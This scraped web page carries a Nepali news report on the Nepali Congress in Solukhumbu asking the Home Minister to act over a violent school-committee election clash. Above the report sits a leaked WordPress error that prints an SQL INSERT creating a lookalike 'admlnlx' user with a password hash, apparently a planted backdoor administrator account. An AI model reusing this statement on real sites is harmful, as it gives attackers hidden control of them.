WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BCMZIDhR2C9f4gfeKGpcHXhZhi180k/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 22:57:12', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । महाकुलुङ ३ स्थित छेस्काम माबिमा भएको घटनाको दोषीलाई कारबाहीको माग गदै नेपाली काग्रेस जिल्ला कार्य समिति सोलुखुम्बुले गृहमन्त्री राम बहादुर थापा बादललाई ध्यानकर्षण पत्र बुझाएको छ ।
आज सोमबार जिल्ला सभापति बिनोद कुमार बस्नेतको टोलिले गृहमन्त्री थापालाई बिद्यालयमा भएको घटनाको जानकारी गराउदै दोषीलाई कारबाहीको माग गर्नुभएको हो ।
माघ ३ गते शनिबार भएको छेस्काम माध्यमिक बिद्यालयको ब्यवस्थापन समितिको निर्बाचनमा दुबै पक्ष बीच भएको झडपमा नेपाली काग्रेस महाकुलुङ गाउँपालिका वडा नम्बर ३ का वडा सभापति बिद्याराज कुलुङ गम्भिर घाइते भएको छ । शिक्षाको प्रबित्र मन्दिरमा भएको घटनाको निन्दनीय कार्य भएको प्रति घोर आपती जनाउदै घटना संलग्न दोषीहरुलाई तत्काल प्रक्राउ गरि हदैसम्मको कारबाही गर्न र शन्तिपुर्ण बाताबरणमा बिद्यालय सञ्चालनको गर्ने अबस्था तत्काल मिलाउन सरकार समक्ष माग गरिएको छ ।
प्रहरी प्रसाशन सत्ताको आडमा एकपक्षिय रुपमा लागेको दाबी समेत गरिएको छ । इलाका प्रहरी कार्यलय सोताङमा उजुरी गरिसक्दा समेत प्रहरी प्रसाशनले कानुनी कारबाही तर्फ कुनै कदम नचालिनु खेदजनक रहेको ध्यानकर्षण पत्र उल्लेख गरिएको छ ।